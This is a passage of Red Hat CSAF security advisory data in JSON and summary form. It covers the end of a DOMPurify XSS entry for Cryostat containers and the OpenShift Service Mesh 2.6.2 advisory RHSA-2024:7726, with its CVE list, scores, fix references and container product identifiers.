{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
rhsa-2024_7726
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2024-11-06 07:10
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7726",
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "OSSM-3337",
"url": "https://issues.redhat.com/browse/OSSM-3337"
},
{
"category": "external",
"summary": "OSSM-8001",
"url": "https://issues.redhat.com/browse/OSSM-8001"
},
{
"category": "external",
"summary": "OSSM-8099",
"url": "https://issues.redhat.com/browse/OSSM-8099"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2",
"tracking": {
"current_release_date": "2024-11-06T07:10:48+00:00",
"generator": {
"date": "2024-11-06T07:10:48+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:7726",
"initial_release_date": "2024-10-07T09:24:48+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:48+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:48+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:10:48+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 8",
"product": {
"name": "RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
},
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 9",
"product": {
"name": "RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
